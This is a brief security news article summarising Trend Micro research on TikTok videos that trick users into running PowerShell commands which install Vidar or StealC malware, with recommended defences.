TikTok Videos Trick Users Into Installing Vidar Malware

Cybercriminals are exploiting TikTok’s algorithmic reach to distribute malware through fake software activation videos, according to research by Trend Micro. The campaign, known as ClickFix, uses AI-generated content to trick users into running PowerShell commands disguised as steps for unlocking premium features in apps like Windows, Office, CapCut, and Spotify.

The scripts download and execute Vidar or StealC malware, disable protections, establish persistence via the Windows registry, and erase evidence. One video amassed nearly 500,000 views and over 20,000 likes before removal, highlighting how trust in social media can be manipulated.

Vidar connects to command-and-control servers using services such as Telegram and Steam to obscure its infrastructure, while StealC uses direct IP communication. Several nearly identical videos were traced to inactive TikTok accounts, suggesting automated content generation.

Trend Micro warns that traditional defenses may miss such threats and recommends integrating behavioral analysis, social media monitoring, and user education into security strategies to counter evolving attack methods.